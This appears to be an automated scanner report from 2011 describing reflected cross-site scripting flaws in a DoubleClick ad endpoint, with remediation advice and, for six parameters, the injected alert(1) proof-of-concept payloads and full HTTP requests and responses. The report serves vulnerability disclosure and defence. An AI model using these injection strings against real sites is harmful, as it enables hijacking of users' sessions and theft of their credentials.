Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9c8"-alert(1)-"ed8d98066a7 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:31:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8925
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D87663 ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"6726dbbe500 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:31:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8982
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 112f0"-alert(1)-"3c37d85996f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:32:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8953
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... %3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2ffree.turbotax.c ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3b8"-alert(1)-"ad6539c90a was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:32:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8942
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2fl ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b3b5"-alert(1)-"6e28e40048e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:32:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8953
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddba6"-alert(1)-"6c8bf62d897 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:31:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8941
